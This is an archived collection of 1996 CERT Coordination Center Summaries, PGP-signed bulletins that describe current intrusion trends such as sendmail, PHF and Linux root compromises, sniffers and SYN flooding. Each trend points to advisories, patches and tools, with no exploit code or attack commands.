home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Textfiles
/
cert
/
CERTSummaries96.sit.hqx
/
CERT summaries 96'
next >
Wrap
PGP Signed Message
|
1997-01-21
|
56KB
|
1,599 lines
-----BEGIN PGP SIGNED MESSAGE-----
- ---------------------------------------------------------------------------
CERT(sm) Summary CS-96.01
January 23, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
strategic incident response staff. The summary includes pointers to
sources of information for dealing with the problems. We also list new
or updated files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Recent Activity
- ---------------
In the last two months we have seen the same types of activity that we
described in the CERT advisory CA-95:18 Widespread Attacks on Internet
Sites. If you have not yet taken steps to protect your site against
the activities described below, we urge you to do so as soon as
possible.
Description
Intruders are doing the following:
- using automated tools to scan sites for NFS and NIS vulnerabilities
- exploiting the rpc.ypupdated vulnerability to gain root access
- exploiting the loadmodule vulnerability to gain root access
- installing Trojan horse programs and packet sniffers
- launching IP spoofing attacks
Solution
The CERT staff urges you to immediately take the steps described in
the advisories referenced below. Note that it is important to
periodically recheck these files as they contain updated
information received after the advisory was published.
a. Using automated tools to scan sites for NFS and NIS vulnerabilities
* CA-94:15.NFS.Vulnerabilities
* CA-92:13.SunOS.NIS.vulnerability
b. Exploiting the rpc.ypupdated vulnerability to gain root access
* CA-95:17.rpc.ypupdated.vul
c. Exploiting the loadmodule vulnerability to gain root access
* CA-93:18.SunOS.Solbourne.loadmodule.modload.vulnerability
* CA-95:12.sun.loadmodule.vul
d. Installing Trojan horse programs and packet sniffers
* CA-94:01.ongoing.network.monitoring.attacks
e. Launching IP spoofing attacks
* CA-95:01.IP.spoofing
The CERT advisories are available from
ftp://info.cert.org/pub/cert_advisories
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (November 28,
1995).
* New Additions
ftp://info.cert.org/pub/
Sysadmin_Tutorial.announcement (This CERT course will be given
four times this year in Pittsburgh,
Pennsylvania, USA.)
ftp://info.cert.org/pub/cert_advisories/
CA-95:16.wu-ftpd.vul
CA-95:17.rpc.ypupdated.vul
CA-95:18.widespread.attacks
ftp://info.cert.org/pub/cert_bulletins/
VB-95:10.elm
VB-95:10a.elm (listed additional FTP sites)
* Updated Files
ftp://info.cert.org/pub/
cert_faq
ftp://info.cert.org/pub/cert_advisories/
CA-95:13 (syslog - added info from Digital Equipment)
CA-95:15 (SGI lp - added info)
CA-95:16 (wu-ftpd - added clarification and Solaris 2.4 info)
CA-95:17 (rpc.ypupdated - added vendor info for Digital & HP)
ftp://info.cert.org/pub/tech_tips/
AUSCERT_checklist1.1 (replaced AUSCERT checklist version 1.0)
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCsXHVP+x0t4w7BAQHfBgQAuo/+ApxplmfDVxE0O6IahjhJmzKO28M8
X4Hx+BtfZycxe3WgT7mHVTN4iIl2n8k4d1PAUJZGdzhYe7kjiH2auiVUEruR9fQC
aREps8J2gn1BWWUijWuVWMQZ8n0IRmeRseJu1Fa17oz93QnKThPD4H31O8+fj6Jh
Pzgs8THUUX4=
=3+Ic
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
- ---------------------------------------------------------------------------
CERT(sm) Summary CS-96.02
March 26, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
strategic incident response staff. The summary includes pointers to
sources of information for dealing with the problems. We also list new
or updated files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Recent Activity
- ---------------
In the two months since the last CERT Summary, we have continued to
receive reports about the same types of activities that were described
in CERT advisory CA-95:18 Widespread Attacks on Internet Sites. In
addition, we have seen an increase in the number of reports relating
to software piracy, many of which involve intruders taking advantage
of systems with poorly configured anonymous FTP areas.
If you haven't done so already, the CERT staff urges you to
immediately take the steps described in the advisories listed below.
Note that it is important to periodically recheck these files, as they
can contain updated information that we receive after an advisory is
published.
The majority of the incidents reported to our incident response staff
during the last two months fit into one (or more) of these seven
categories:
1. Root compromise on systems that are unpatched or running old OS versions.
We receive daily reports of systems that have been compromised by
intruders who have gained unauthorized access to root or other
privileged accounts by exploiting widely known security vulnerabilities
on systems that did not have appropriate patches installed (and/or
systems that were running old [unpatched] versions of the operating
system).
We encourage everyone to check with their vendor(s) regularly for
updates or new patches that relate to their systems, and install
security-related patches as soon as they are available.
For a list of additional suggestions on recovering from a UNIX root
compromise, see
ftp://info.cert.org/pub/tech_tips/root_compromise
2. Compromised user-level accounts that are leveraged to gain further access.
We receive daily reports of compromised accounts that have been used to
launch attacks against other sites, and/or have been used to gain
privileged access on vulnerable systems.
We encourage you to check your systems regularly (in accordance
with your site policies and guidelines) for any signs of unauthorized
accesses or suspicious activity.
For a list of suggestions on how to determine whether your system may
have been compromised, see
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist
3. Packet sniffers and Trojan horse programs
We continue to receive almost daily incident reports about intruders who
have installed packet sniffers on root-compromised systems. These
sniffers, used to collect account names and passwords, are frequently
installed as part of a widely-available kit that also replaces common
system files with Trojan horse programs. The Trojan horse binaries
(du, ls, ifconfig, netstat, login, ps, etc.) hide the intruders'
files and sniffer activity on the system on which they are installed.
For further information and methods for detecting packet sniffers and
Trojan horse binaries, see the following files:
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/cert_advisories/CA-94:05.MD5.checksums
4. IP spoofing attacks
We continue to receive several reports each week of IP spoofing
attacks. Intruders attack by using automated tools that are becoming
widespread on the Internet. Some sites incorrectly believed that they
were blocking such spoofed packets, and others planned to block them but
hadn't yet done so.
For further information on this type of attack and how to prevent it,
see
ftp://info.cert.org/pub/cert_advisories/CA-95:01.IP.spoofing
5. Software piracy
We receive new reports each week about compromised accounts and/or
poorly configured anonymous FTP servers that are being used for
exchanging pirated software. While the compromised accounts should be
addressed as a separate security issue (see item 2, above), the abuse of
anonymous FTP areas for software piracy activities can be reduced if the
anonymous FTP service is correctly configured and administered.
For related information and guidelines for configuring anonymous FTP,
see
ftp://info.cert.org/pub/cert_advisories/CA-93:10.anonymous.FTP.activity
6. Sendmail attacks
We still receive new reports each week about intruders attempting to
exploit vulnerabilities in the sendmail program mailer facility.
Unfortunately, some of these attacks have been successful against sites
that are running old versions of sendmail and/or are not restricting the
sendmail program mailer facility. Sendmail's program mailer facility can
be restricted by using the sendmail restricted shell program (smrsh).
Information on known sendmail vulnerabilities and the smrsh tool can be
obtained from
ftp://info.cert.org/pub/cert_advisories/CA-93:16.sendmail.vulnerability
ftp://info.cert.org/pub/cert_advisories/CA-93:16a.sendmail.vulnerability.supplement
ftp://info.cert.org/pub/cert_advisories/CA-95:05.sendmail.vulnerabilities
ftp://info.cert.org/pub/cert_advisories/CA-95:08.sendmail.v.5.vulnerability
ftp://info.cert.org/pub/cert_advisories/CA-95:11.sun.sendmail-oR.vul
ftp://info.cert.org/pub/cert_advisories/CA-95:13.syslog.vul
The smrsh program can be obtained from:
ftp://info.cert.org/pub/tools/smrsh/
smrsh is also included in the sendmail 8.7.5 distribution.
7. NFS and NIS attacks, and automated tools to scan for vulnerabilities
We receive weekly reports of intruders using automated tools to scan
sites for hosts that may be vulnerable to NFS and NIS attacks.
Intruders are continuing to exploit the rpc.ypupdated vulnerability to
gain root access, and intruders are still exploiting widely known
vulnerabilities in NFS to gain root access.
For related information, see
ftp://info.cert.org/pub/cert_advisories/CA-95:17.rpc.ypupdated.vul
ftp://info.cert.org/pub/cert_advisories/CA-94:15.NFS.Vulnerabilities
ftp://info.cert.org/pub/cert_advisories/CA-92:13.SunOS.NIS.vulnerability
What's New at the CERT Coordination Center
- ------------------------------------------
The CERT Coordination Center has a new Web site. It includes
information on Internet security and has a link to the CERT FTP
archive.
http://www.cert.org
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (January 23,
1996).
* New Additions
ftp://info.cert.org/pub
incident_reporting_form v.3 (replaced v.2 with v.3)
ftp://info.cert.org/pub/cert_advisories
CA-96.01.UDP_service_denial
CA-96.02.bind
CA-96.03.kerberos_4_key_server
CA-96.04.corrupt_info_from_servers
CA-96.05.java_applet_security_mgr
CA-96.06.cgi_example_code
ftp://info.cert.org/pub/cert_bulletins
VB-96.01.splitvt
VB-96.02.sgi
VB-96.03.sun
VB-96.04.bsdi
ftp://info.cert.org/pub/FIRST
conference.info
ftp://info.cert.org/pub/tech_tips
root_compromise
ftp://info.cert.org/pub/tools
/cpm/* (replaced older version with v.1.2)
/sendmail/sendmail.8.7.5 (replaced older version)
/tcp_wrappers/tcp_wrappers_7.3 (replaced older version)
/sendmail/smrsh/* (replaced older vsersion with v.8.4)
ftp://info.cert.org/pub/vendors
/sgi/SGI_contact_info
* Updated Files
ftp://info.cert.org/pub
cert_faq (version 10.2)
ftp://info.cert.org/pub/cert_advisories
CA-94:01 (added info about cpm v.1.2)
CA-95:13 (added info from sendmail author and Cray; added
info from HP and Sun)
CA-95:14 (added info from NEC Corp and Silicon Graphics)
CA-95:17 (added info from IBM)
CA-96.01 (new URL for Argus; added info from Silicon Graphics)
CA-96.02 (added info from IBM, Solbourne, and Silicon
Graphics)
CA-96.03 (added new checksums and patch info; added
info from Transarc and TGV Software, Inc.)
CA-96.04 (added info from Silicon Graphics)
CA-96.05 (added pointer to Netscape 2.01)
rdist-patch-status (added pointer to version 6.1.2)
ftp://info.cert.org/pub/vendors
/hp/HP.contact.info
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
URLs: http://www.cert.org/
ftp://info.cert.org/pub/
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCtFXVP+x0t4w7BAQGqMwP8Da/27XOhG+hWDqO69XiYxTXFQUrDPkKz
5KaHbMjEKnCj1pu1zt71cNdxCj6zz4fpfRxGqPdORkwLvl7glgWjxtW3bhRJVje3
ytdb8Us0fLwQ+zZnkfgkTJa5MNwCLGwF3ntLpupWH+9yJBZd5taZ+rIleb12tRFb
Jw7H7y2bNjM=
=YDeN
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
- ---------------------------------------------------------------------------
CERT(sm) Summary CS-96.03
May 22, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
We have changed the way we sign CERT publications.
Before May 20, 1996, we put our PGP signature in a separate .asc file,
which was available for anonymous FTP.
As of May 20, 1996, the CERT PGP signature is in the document itself.
CS-96.03 (this summary), VB-96.06, and VB-96.07 are signed this way. The first
advisory to be signed this way will be CA-96.10, which has not yet been
released.
In addition, we have removed the .asc files from past publications and
re-signed them in the text.
You can get the CERT public key from PGP Public Key Servers and from
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Recent Activity
- ---------------
Since the March CERT Summary, we have seen these continuing trends in
incidents reported to us.
1. Password files and cracking
We have seen an increase in incidents in which intruders obtain
password files from sites and then try to compromise accounts by
cracking passwords. Once intruders gain access to a user account, they
attempt to gain root access through a cracked root password or by
exploiting another vulnerability.
These incidents point to the need for system administrators to address
three areas:
- Protect your password file so an intruder cannot obtain a
copy of it.
- Ensure that good passwords are selected so that they cannot
easily be cracked, or use a technology where passwords
are not located in the password file.
- Ensure that you are up to date with security patches and
workarounds and watch for unusual activity.
To learn more about these problems, see the following file:
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
2. Linux machines
We have seen an increase in break-ins and root compromises of Linux
machines. In some cases, the intruders are installing packet sniffers
on Linux machines. If you are use Linux on your machines,
we recommend that you keep up to date with patches and security
workarounds. We also recommend that you review
ftp://info.cert.org/pub/cert_advisories/CA-94:01.ongoing.network.monitoring.attacks
The advisory describes sniffers, suggests approaches for addressing
the problem, and contains updated information after advisory was
issued.
We also recommend that you monitor the Linux newsgroups and mailing
lists for security patches and workarounds. Additionally, a World Wide
Web page that some sites reference is
http://bach.cis.temple.edu/linux/linux-security
Note that this reference should not be construed as a formal
endorsement of the page or its contents. We are simply including it in
this summary so that our readers are aware of its existence; you may
evaluate it as appropriate to your situation.
3. Machines being probed to find known vulnerabilities
We continue to get reports of machines being probed for known vulnerabilities.
In many cases, these sites did not have up-to-date security patches and the
machines were compromised at the root level.
In some cases, the intruders are using the Internet Security Scanner (ISS).
These intruders frequently use ISS on a large range of IP addresses and then
use the information collected to compromise vulnerable computers.
So that you can determine if your machines are vulnerable to the problems that
ISS examines, you may wish to run ISS against your own site (in accordance
with your organization's policies and procedures). ISS is available from
ftp://info.cert.org/pub/tools/iss/iss13.tar
We also encourage you to take relevant steps discussed in these documents:
ftp://info.cert.org/pub/cert_advisories/CA-93:14.Internet.Security.Scanner
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist
ftp://info.cert.org/pub/tech_tips/packet_filtering
4. Mail spoofing and mail bombing
We have seen a large increase in the number of reports concerning
email spoofing, bombing, and spamming. To learn more about dealing
with these issues, see the files:
ftp://info.cert.org/pub/tech_tips/email_bombing_spamming
ftp://info.cert.org/pub/tech_tips/email_spoofing
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (March 26,
1996).
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.07.java_bytecode_verifier
CA-96.08.pcnfsd
CA-96.09.rpc.statd
ftp://info.cert.org/pub/cert_bulletins/
VB-96.05.dec
VB-96.06.freebsd
VB-96.07.freebsd
ftp://info.cert.org/pub/tech_tips
root_compromise
anonymous_ftp_abuses
email_bombing_spamming
email_spoofing
passwd_file_protection
* Updated Files
ftp://info.cert.org/pub/cert_advisories/
CA-94:04
CA-94:09
CA-95:01 (added a pointer to Argus)
CA-95:13
CA-96.02
CA-96.06 (added info from another response team)
CA-96.07 (added a pointer to Netscape 2.02)
CA-96.08 (updated fix info that was in the original Appendix B)
CA-96.09 (added info from TGV/Cisco, a workaround for SunOS 4.s,
and a clarification)
CA-96.13 (added info from the Santa Cruz Operation)
ftp://info.cert.org/pub/tech_tips
anonymous_ftp_config (file name changed)
ftp://info.cert.org/pub/tools
/ValidateHostname (replaced older version of IsValid.c and updated the
README)
ftp://info.cert.org/pub/vendors
/sgi/SGI_contact_info (added URL for SGI Security Web pages)
Keeping Current
- ---------------
Often during the couse of our work, we learn about software upgrades
that fix security problems. In a new section of our FTP archive we
list these upgrades, their sources, and their MD5 checksums.
ftp://info.cert.org/pub/latest_sw_versions/
If you use any of the software listed in this directory, we recommend
that you upgrade to the current versions. Among other changes, these
new versions address security weaknesses present in previous versions.
If you have any questions about the software listed in this directory,
please contact the vendor for more information.
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://info.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCtvnVP+x0t4w7BAQGPxwP+OXm4mGzeNJ5boL2GLh/ba8PaLlW0YE5q
d43gdRhmSuT66PtOwrCG9zqwhuomHbRKTbifS9KVVfWDQaDUtGYEAuEWFL9CT0D4
/qh3RO7TrBiQ2sgZoakOpdXXkc3qjqrj9voMk/N9dPWd8WiVxp3Ujzc26sadxydB
9G8fLVqEYW4=
=DEop
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
- ----------------------------------------------------------------------------
CERT(sm) Summary CS-96.04
July 23, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Increasing Sophistication of Intruder Community Expertise
- ---------------------------------------------------------
In earlier summaries, we noted that the intruder community was
analyzing operating system source code to develop increasingly
sophisticated and effective exploitation techniques. The intruder
community is now developing new techniques to analyze programs for
potential vulnerabilities even in the absence of source code. This can
be done with a tool that traces system calls and subroutine calls
within a program, thus allowing a person to match such calls against
command line parameters.
Although there is little that sites can do in direct response to this
information, it does highlight the importance of staying up to date
with security patches and workarounds for your operating systems and
applications.
Operating System Concerns
- -------------------------
We receive reports relating to incident activity from many different
sites using a wide variety of operating systems. Because of problems
we see that directly relate to operating systems, we felt it
worthwhile to make a few observations about choosing an operating
system. For information on this subject, see
ftp://info.cert.org/pub/tech_tips/choose_operating_sys
Forged Advisories
- -----------------
Occasionally, we see forged advisories on various newsgroups or other
distribution lists. If you have the Pretty Good Privacy (PGP) program,
you can determine whether or not an advisory is genuine by checking
the PGP signature.
We use PGP to sign all our advisories. To verify that a CERT advisory
is authentic,
1. Get the CERT public key from
ftp://info.cert.org/pub/CERT_PGP.key
2. Verify the authenticity of the document by checking the PGP
signature. To do this, enter the following command:
%pgp <filename>
You should see a message that includes the statement
Good signature from user "CERT Coordination Center <cert@cert.org>".
Signature made <date>
Recent Activity and Trends
- --------------------------
Since the May CERT Summary, we have seen these continuing trends in
incidents reported to us.
1. Linux root compromises
At least once a week we see reports of Linux machines that suffer
break-ins leading to root compromises. In many of these incidents, the
systems were misconfigured, and/or the intruders exploited well-known
vulnerabilities (for which CERT advisories have been published); the
intruders then installed Trojan horse programs and/or network
monitoring programs (packet sniffers).
If you are running Linux, we strongly urge you to keep up to date with
patches and security workarounds. We recommend that you also review
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
Further, you may want to monitor the Linux newsgroups and mailing
lists for security patches and workarounds. More information can be
found at
http://bach.cis.temple.edu/linux/linux-security/
2. Telnetd in Linux systems
We have noticed an increase in the exploitation of a vulnerability in
the telnetd environment on unpatched Linux-based systems. If you have
not patched your system(s) for this vulnerability, we urge you to
review CERT advisory CA-95:14 and install the patch or workaround
provided.
ftp://info.cert.org/pub/cert_advisories/CA-95:14.Telnetd_Environment_Vulnerability
3. Password Cracking
We continue to receive daily reports of unauthorized site access as a
result of compromised accounts and/or "cracked" passwords. For
information about protecting your password files, please see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
4. Sendmail attacks
Although discussed in previous summaries, we continue to receive
reports each week about intruders who attempt to exploit sendmail
vulnerabilities. We have published several advisories on sendmail. If
you have not addressed the vulnerabilities in sendmail, we urge you to
review these advisories and take appropriate action. All advisories,
including sendmail advisories, can be found at
ftp://info.cert.org/pub/cert_advisories/
In many of these attempts, intruders are trying to obtain
password files. For information on protecting your password files, see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
We have had many questions about when to use the sendmail restricted
shell program (smrsh). You should run smrsh with any UNIX system that
is running sendmail, regardless of vendor or version.
smrsh is now included as part of the current sendmail distribution
(effective with version 8.7.1). We strongly urge you to upgrade to the
latest version of sendmail. See
ftp://info.cert.org/pub/latest_sw_versions/sendmail
5. cgi-bin vulnerabilities
Since our last summary, we've seen an increase in the number of
reports relating to vulnerabilities in cgi-bin programs. Any cgi-bin
program that relies on escape_shell_cmd() to prevent exploitation of
shell-based library calls may be vulnerable to attack. For more
information about cgi-bin vulnerabilities and patches, please see
ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code
There have been discussions in several public forums about the problem
of general-purpose interpreters being placed in the cgi-bin directory.
If these interpreters are accessible in the cgi-bin directory of a Web
server, then a remote user can execute any command the interpreters
can execute on that server. For more details and patch information,
see
ftp://info.cert.org/pub/cert_advisories/CA-96.11.interpreters_in_cgi_bin_dir
6. Mail spamming/spoofing attacks
We receive at least three incidents each week of mail spamming and/or
spoofing attacks. For information on responding to and recovering from such
activity, see
ftp://info.cert.org/pub/tech_tips/email_bombing_spamming
ftp://info.cert.org/pub/tech_tips/email_spoofing
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (May 22, 1996).
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.10.nis+_configuration
CA-96.11.interpreters_in_cgi_bin_dir
CA-96.12.suidperl_vul
CA-96.13.dip_vul
ftp://info.cert.org/pub/cert_bulletins/
VB-96.08.sgi
VB-96.09.freebsd
VB-96.10.sco
VB-96.11.freebsd
ftp://info.cert.org/pub/tech_tips/
choose_operating_sys Things to consider when choosing an
operating system for your site
ftp://info.cert.org/pub/tools/
ifstatus Added the ifstatus program
ftp://info.cert.org/pub/vendors/
sun/sun_bulletin_00135 Added bulletin from Sun
Microsystems, Inc.
dec/dec-96.0383 Added bulletin from Digital
Equipment Corporation
* Updated Files
ftp://info.cert.org/pub/cert_advisories/
CA-95:13 Added vendor information for Digital
Equipment Corporation and Silicon
Graphics, Inc.
CA-96.04 Added information about the next
release of BIND
CA-96.08 Added vendor information for Digital
Equipment Corporation, NEC
Corporation, and Data Design Systems,
Inc. Added patch information for
FreeBSD, Inc.
CA-96.09 Added vendor information for Digital
Equipment Corporation. Added pointers
to Silicon Graphics, Inc. release notes
and Sun Microsystems, Inc. patches
CA-96.12 Added vendor information for FreeBSD,
NEC Corporation, and Digital Equipment
Corporation
ftp://info.cert.org/pub/FIRST/
first-contacts Updated contact information
ftp://info.cert.org/pub/latest_sw_versions/
bind Added pointer to version 4.9.4
ifstatus Added pointer to ifstatus
If you use any of the software listed in this directory, we recommend
that you upgrade to the current versions. Among other changes, these
new versions address security weaknesses present in previous versions.
If you have any questions about the software listed in this directory,
please contact the vendor for more information.
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert@cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request@cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://info.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMhCusnVP+x0t4w7BAQF2YAQAzS5ioLEfcEmbAkqldMFuIK22VhyDHF1j
2oDoYNEoXVbxvCG4P2hsQBfLY7gYPDBcQmAtQENre4KgewCChhvcwOLYtHHXWH/j
kwNZbmU4ymPFB4VpJ8VuMDvkWXid7loNbYGaxohUsp3tMM8LubmeAMYgFtt5ot2y
wZR8k/9jwzo=
=BZOQ
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
CERT(sm) Summary CS-96.05
September 24, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ---------------------------------------------------------------------------
Clarification to CS-96.04
- -------------------------
In our previous CERT Summary, we said that the intruder community is
developing new techniques and tools to analyze programs for potential
vulnerabilities even in the absence of source code. We did not mean to imply
that all developers of these techniques in the wider technical community are
members of the intruder community, nor that they intend their work to be used
by the intruder community.
Recent Activity and Trends
- --------------------------
Since the July CERT Summary, we have noticed these trends in incidents
reported to us.
1. Denial of Service Attacks
Instructions for executing denial-of-service attacks and programs to
implement such attacks have recently been widely distributed. Since
this information was published, we have noticed a significant and
rapid increase in the number of denial-of-service attacks executed
against sites.
To learn more about denial-of-service attacks and how to limit them,
see
ftp://info.cert.org/pub/cert_advisories/CA-96.21.tcp_syn_flooding
To monitor and log an attack, you can use a tool such as Argus. For
more information regarding Argus, see
ftp://info.cert.org/pub/tech_tips/security_tools
2. Continuing Linux Exploitations
We continue to see incidents in which Linux machines are the victims
of break-ins leading to root compromises. In many of these incidents,
the systems were misconfigured and/or the intruders exploited
well-known vulnerabilities for which CERT advisories have been
published.
If you are running Linux, we strongly urge you to keep up to date with
patches and security workarounds. We also recommend that you review
ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
Further, you may want to monitor the Linux newsgroups and mailing
lists for security patches and workarounds. More information can be
found at
http://bach.cis.temple.edu/linux/linux-security/
3. PHF Exploits
At least weekly, and often daily, we see reports of password files
being obtained illegally by intruders who have exploited a
vulnerability in the PHF cgi-bin script. The script is installed by
default with several implementations of httpd servers, and it contains
a weakness that allows intruders to retrieve the password file for the
machine running the httpd server. The vulnerability is described in
ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code
Once the intruders retrieve the password file, they may attempt to
crack the passwords found in the file. For information about
protecting your password files, please see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
4. Software Piracy
We have received frequent reports regarding software piracy since the
last CERT Summary was issued. Although software piracy is beyond the
scope of the mission of the CERT Coordination Center, it is often
associated with compromised hosts or accounts because intruders
sometimes use compromised hosts to distribute pirated software. News
of illegal collections of software circulates quickly within the
underground community, which may focus unwanted attention on a site
used for software piracy.
We encourage you to periodically check your systems for signs of
software piracy. To learn more, please examine our relevant tech tips:
ftp://info.cert.org/pub/tech_tips/anonymous_ftp_abuses
ftp://info.cert.org/pub/tech_tips/anonymous_ftp_config
To learn more about detecting and preventing security breaches, please see
ftp://info.cert.org/pub/tech_tips/intruder_detection_checklist
- ----------------------------------
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (July 23,
1996).
* README Files Incorporated into Advisories
As of August 30, 1996, we no longer put advisory updates into README files. We
now revise the advisories themselves. In addition, we have updated past
advisories with information from their README files. We urge you to check
advisories regularly for updates that relate to your site.
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.14.rdist_vul
CA-96.15.Solaris_KCMS_vul
CA-96.16.Solaris_admintool_vul
CA-96.17.Solaris_vold_vul
CA-96.18.fm_fls
CA-96.19.expreserve
CA-96.20.sendmail_vul
CA-96.21.tcp_syn_flooding
ftp://info.cert.org/pub/cert_bulletins/
VB-96.12.freebsd
VB-96.13.hp
VB-96.14.sgi
VB-96.15.sco
VB-96.16.transarc
